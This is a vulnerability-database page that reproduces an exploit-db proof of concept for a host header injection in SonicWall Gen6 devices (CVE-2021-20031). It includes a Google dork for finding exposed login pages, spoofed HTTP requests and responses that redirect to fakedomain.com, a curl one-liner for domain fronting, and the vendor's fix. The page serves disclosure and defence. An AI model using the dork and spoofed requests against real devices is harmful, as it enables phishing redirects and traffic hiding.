Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Sonicwall SonicOS 7.0 - Host Header Injection

🗓️ 13 Oct 2021 00:00:00Reported by RamikanType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 360 Views

Sonicwall SonicOS 7.0 - Host Header Injection allows attacker to spoof Host header, leading to potential host header injection attack and domain fronting

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Sonicwall SonicOS 7.0 - Host Header Injection Vulnerability
13 Oct 202100:00
zdt
Circl		CVE-2021-20031
13 Oct 202102:25
circl
CNNVD		SonicOS 输入验证错误漏洞
12 Oct 202100:00
cnnvd
CVE		CVE-2021-20031
12 Oct 202122:55
cve
Cvelist		CVE-2021-20031
12 Oct 202122:55
cvelist
NCSC		Vulnerability fixed in SonicOS
13 Oct 202100:00
ncsc
Nuclei		SonicWall SonicOS 7.0 - Open Redirect
3 Jun 202606:04
nuclei
NVD		CVE-2021-20031
12 Oct 202123:15
nvd
Packet Storm		Sonicwall SonicOS 7.0 Host Header Injection
13 Oct 202100:00
packetstorm
Prion		Design/Logic Flaw
12 Oct 202123:15
prion
Rows per page
# Exploit Title: Sonicwall SonicOS 7.0 - Host Header Injection
# Google Dork: inurl:"auth.html" intitle:"SonicWall" 
#                        intitle:"SonicWall Analyzer Login"
# Discovered Date: 03/09/2020
# Reported Date: 07/09/2020
# Exploit Author: Ramikan 
# Vendor Homepage:sonicwall.com
# Affected Devices: All SonicWall Next Gen 6 Devices
# Tested On: SonicWall NAS 6.2.5
# Affected Version: All SonicWall Next Gen 6 Devices till 6.5.3
# Fixed Version:Gen6 firmware 6.5.4.8-89n 
# CVE : CVE-2021-20031
# CVSS v3:5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)
# Category:Hardware, Web Apps
# Reference : https://github.com/Ramikan/Vulnerabilities/

*************************************************************************************************************************************

Vulnerability 1: Host Header Injection

*************************************************************************************************************************************
Description:
A Host Header Injection vulnerability may allow an attacker to spoof a particular Host header, allowing the attacker to render arbitrary links that point to a malicious website with poisoned Host header webpages.
An issue was discovered in Sonicwall NAS, SonicWall Analyzer version 8.5.0 (may be affected on other versions too). The values of the 'Host' headers are implicitly set as trusted while this should be forbidden, leading to potential host header injection attack and also the affected hosts can be used for domain fronting. This means affected hosts can be used by attackers to hide behind during various other attack

Impact:
Host Header changed to different domain (fakedomain.com).
Fakedomain.com can be found in two lines in the HTTP response, below are the two lines.

var jumpURL = "https://fakedomain.com/auth.html";
ease be patient as you are being re-directed to <a href="https://fakedomain.com/auth.html" target="_top">a secure login page</a>

*************************************************************************************************************************************
Normal Request
*************************************************************************************************************************************
GET / HTTP/1.1
Host: 192.168.10.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

*************************************************************************************************************************************
Normal Response
*************************************************************************************************************************************
HTTP/1.0 200 OK
Server: SonicWALL
Expires: -1
Cache-Control: no-cache
Content-type: text/html; charset=UTF-8;
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' blob: data: ws: wss: sonicwall.com *.sonicwall.com;

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
++++++++++++++++++snipped+++++++++++++++++++++++

</head>
<body class="login_bg">
	<div class="login_outer">
		<div class="login_inner">
			<div class="vgap48"></div>
			<div class="login_logo">
				<img src="logo_sw.png">
			</div>
			<div class="login_prodname">
				Network Security Appliance
			</div>
			<div class="vgap48"></div>
			<div class="login_msg_header">
				Please be patient as you are being re-directed to <a href="https://192.168.10.1/auth.html" target="_top">a secure login page</a>
			</div>
			<div class="vgap24"></div>
		</div>
	</div>


</body>
</html>
*************************************************************************************************************************************
POC 
*************************************************************************************************************************************

Host Header changed to different domain (fakedomain.com).
Fakedomain.com can be found in two lines in the response, below are the two lines.

var jumpURL = "https://fakedomain.com/auth.html";
ease be patient as you are being re-directed to <a href="https://fakedomain.com/auth.html" target="_top">a secure login page</a>

*************************************************************************************************************************************
Request:
*************************************************************************************************************************************
GET / HTTP/1.1
Host: fakedomain.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Upgrade-Insecure-Requests: 1
Connection: close
Cookie: temp=

*************************************************************************************************************************************
Response:
*************************************************************************************************************************************

HTTP/1.0 200 OK
Server: SonicWALL
Expires: -1
Cache-Control: no-cache
Content-type: text/html; charset=UTF-8;
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' blob: data: ws: wss: sonicwall.com *.sonicwall.com;

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<meta http-equiv="Content-Type" content="text/html">
<title>Document Moved</title>
<meta name="id" content="docJump" >
<link rel=stylesheet href="swl_styles-6.2.5-2464327966.css" TYPE="text/css">
<link rel=stylesheet href="swl_login-6.2.5-2193764341.css" TYPE="text/css">
<script type="text/JavaScript">
var resetSecureFlag = false;
setTimeout("goJump();", 1000);
function goJump() {
	var jumpURL = "https://fakedomain.com/auth.html";
	var jumpProt = jumpURL.substr(0,6).toLowerCase();
	var ix;
	if (jumpProt.substr(0,4) == "http" && (ix = jumpProt.indexOf(":")) != -1) {
		jumpProt = jumpProt.substr(0,ix+1);
		if (location.protocol.toLowerCase() != jumpProt) {
			window.opener = null;
			top.opener = null;
		}
	}
	if (resetSecureFlag) {
		var sessId = getCookie("SessId");
		var pageSeed = swlStore.get("PageSeed", {isGlobal: true});
		if (sessId) { setCookieExt("SessId", sessId, { strictSameSite: true }); }
		if (pageSeed) { swlStore.set("PageSeed", pageSeed, {isGlobal: true}); }
	}
	top.location.href = jumpURL;
}
function setCookie(key, value) {
  var argv = setCookie.arguments;
  var argc = setCookie.arguments.length;
  var expires = (argc > 2) ? argv[2] : null;
  var path = (argc > 3) ? argv[3] : null;
  var domain = (argc > 4) ? argv[4] : null;
  var secure = (argc > 5) ? argv[5] : false;
  document.cookie = key + "=" + escape (value) +
	((expires == null) ? "" : ("; expires=" + expires.toGMTString())) +
	((path == null) ? "" : ("; path=" + path)) +
	((domain == null) ? "" : ("; domain=" + domain)) +
	((secure == true) ? "; secure" : "");
}
function getCookie(key) {
	if (document.cookie.length) {
		var cookies = ' ' + document.cookie;
		var start = cookies.indexOf(' ' + key + '=');
		if (start == -1) {
			return null;
		}
		var end = cookies.indexOf(";", start);
		if (end == -1) {
			end = cookies.length;
		}
		end -= start;
		var cookie = cookies.substr(start,end);
		return unescape(cookie.substr(cookie.indexOf('=') + 1, cookie.length - cookie.indexOf('=') + 1));
	} else {
		return null;
	}
}
</script>

</head>
<body class="login_bg">
	<div class="login_outer">
		<div class="login_inner">
			<div class="vgap48"></div>
			<div class="login_logo">
				<img src="logo_sw.png">
			</div>
			<div class="login_prodname">
				Network Security Appliance
			</div>
			<div class="vgap48"></div>
			<div class="login_msg_header">
				Please be patient as you are being re-directed to <a href="https://fakedomain.com/auth.html" target="_top">a secure login page</a>
			</div>
			<div class="vgap24"></div>
		</div>
	</div>


</body>
</html>

The redirection is happening to https://fakedomain.com/auth.html.

*************************************************************************************************************************************
Attack Vector:
*************************************************************************************************************************************
Can be used for domain fronting.

curl -k --header "Host: attack.host.net" "Domain Name of the Sonicwall device"


*************************************************************************************************************************************
Vendor Response:
*************************************************************************************************************************************
Fix: SonicWall has fixed the issue in Gen6 firmware 6.5.4.8-89n (build is available in mysonicwall.com) -  fix is provided with a CLI option > configure > administration > enforce-http-host-check,  to avoid Host header redirection.
Workaround: Please disable port 80 to mitigate it and this issue affected all Gen6 firewall products.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0019
*************************************************************************************************************************************

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
13 Oct 2021 00:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 25.8
CVSS 3.16.1
EPSS0.36219
sonicwallhost header injectionspoofingattackdomain fronting
360